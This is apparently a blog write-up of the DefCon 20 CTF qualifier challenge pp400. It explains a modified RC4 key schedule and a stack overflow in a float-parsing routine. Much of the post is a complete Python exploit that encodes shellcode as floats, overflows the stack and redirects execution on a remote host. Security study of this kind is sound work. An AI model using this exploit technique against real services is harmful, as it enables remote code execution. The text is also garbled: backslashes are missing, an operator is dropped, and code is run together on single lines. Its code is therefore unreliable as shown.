2012-06-04 12:22

DefCon 20 CTF Qualifications: pp400

The binary takes RC4 encrypted, hex encoded input and then parses the decrypted strings as floats using scanf("%f", ..). The key schedule for the global RC4 state is invoked as ctor, however they broke they key schedule a bit:

void __cdecl rc4_key_schedule()
{
  char swap; // ST0F_1@5
  signed int i; // [sp+8h] [bp-8h]@1
  signed int j; // [sp+8h] [bp-8h]@4
  for ( i = 255; i >= 0; --i )
    rc4_table.sbox[255 - i] = i;
  *(_WORD *)&rc4_table.x = 0;
  for ( j = 0; j <= 255; ++j )
  {
    rc4_table.y += symmetric_key[rc4_table.x & 0xF] + rc4_table.sbox[rc4_table.x];
    swap = rc4_table.sbox[rc4_table.x];
    rc4_table.sbox[rc4_table.x] = rc4_table.sbox[rc4_table.y];
    rc4_table.sbox[rc4_table.y] = swap;
  }
  *(_WORD *)&rc4_table.x = 0;
}

The generation of cipher bytes is unchanged, so we simply need to adjust our key schedule a bit in the exploit. Fixing their broken key schedule is really what took the most time here.

After reading all those floats into a stack array, it will compute average and standard deviation on them and print some funny messages based on them. The vulnerability is again a text-book stack buffer overflow, as it does not check how many floats are input.

long double __cdecl read_encrypted_float(FILE *infile, float *buffer, char index)
{
  float float_result; // [sp+24h] [bp-98h]@1
  char input_buffer[128]; // [sp+28h] [bp-94h]@1
  char *idx; // [sp+A8h] [bp-14h]@1
  int length; // [sp+ACh] [bp-10h]@9
  char stream_byte; // [sp+B3h] [bp-9h]@10

float_result = 0.0; for ( idx = fgets(input_buffer, 128, infile); idx && idx != 'n'; ++idx ) { if ( (unsigned __int8)idx & 1 ) input_buffer[(signed int)(idx - input_buffer) / 2] |= hex_nibble(idx); else input_buffer[(signed int)(idx - input_buffer) / 2] = 16 hex_nibble(idx); } if ( idx ) { length = (signed int)(idx - input_buffer) / 2; input_buffer[(signed int)(idx - input_buffer) / 2] = 0; --length; while ( length >= 0 ) { stream_byte = rc4_get_stream_byte(); input_buffer[length] ^= stream_byte; --length; } sscanf(input_buffer, "%f", &float_result); } buffer[index] = float_result; return buffer[index]; }

The only challenge this time is that our input must be encoded as valid floats. This is trivially done in python, but we must take care that not every 32bit integer can be represented as float, some minor variance in the LSB will occur for a full 32bit integer. For example, doing a round-trip on 0x3f3f3f3f will result in 0x3f3f3f41 (no kidding) in target memory.

The solution again is simple, by leaving the MSB to zero, the number is small enough and will stay intact. And we alreay have shellcode and generator code to ignore the MSB, so we can reuse a lot from pp300 and are good to go. Since 0x41414141 = 4x inc ecx, we can use it as a nopsled and don't care if our overwritten stack address onto the stack gets slightly mangled in the LSB. Note that I'm not overwriting the saved return address but parts of FILE used in fgets, allowing me to place more data on the stack and not go through the value calculation first. Here's the modified pp200 exploits:

import socket, sys, struct, re

instrns = [ ]

for line in open('fbsd82_defcon.lst').readlines(): # 10 00000000 89E7 mov edi, esp m = re.match(r'^s+d+ [0-9A-F]{8} ([0-9A-F]+)', line) if not m: continue instrns.append(m.group(1).decode('hex'))

code = '' idx = 0

while idx < len(instrns): if len(instrns[idx]) == 2: code += instrns[idx] + 'xb3x00' elif len(instrns[idx]) == 1 and len(instrns[idx+1]) == 1: code += instrns[idx] + instrns[idx+1] + 'xb3x00' idx += 1 elif len(instrns[idx]) == 1: code += instrns[idx] + 'x66xb3x00' else: raise ValueError()

idx += 1

if len(code) % 4: code += 'x00' * (4 - (len(code) % 4))

codewords = [ ]

while code != '': codewords.append(struct.unpack('<I', code[:4])[0]) code = code[4:]

def rc4setup(key): box = range(255, -1, -1) x = 0 y = 0 for i in range(256): y = (y + box[x] + (ord(key[x % len(key)]))) % 256 box[x], box[y] = box[y], box[x] return box, 0, 0

def rc4enc(data, box, x, y): out = [ ] for char in data: x = (x + 1) % 256 y = (y + box[x]) % 256 box[x], box[y] = box[y], box[x] out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))

return ''.join(out), box, x, y

sc = open('fbsd82_defcon.bin', 'rb').read()

box, x, y = rc4setup(b'xb6x3dx15x3ax04x15x69x72x45xfexc2x7fx12x78xd7x82')

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) s.connect((sys.argv[1], 4016))

s.send("b366e2776ce9efffn") print s.recv(4096)

def send_float(s, input): global box, x, y input = str(float(input)) if len(input) > 63: raise ValueError() input, box, x, y = rc4enc(input[::-1], box, x, y) input = input[::-1] s.send(input.encode('hex') + 'n')

def send_dword(s, input): send_float(s, struct.unpack('<f', struct.pack('<I', input))[0])

EIP = 0xbfbfea60

codewords = [ 0x41414141 for i in xrange(0, 128 - len(codewords)) ] + codewords codewords = codewords + [ 0x41414141 for i in xrange(0, 248 - len(codewords)) ]

print ', '.join([hex(w) for w in codewords])

for dword in codewords: send_dword(s, dword)

send_dword(s, EIP) send_float(s, 0)

print s.recv(4096) print s.recv(4096)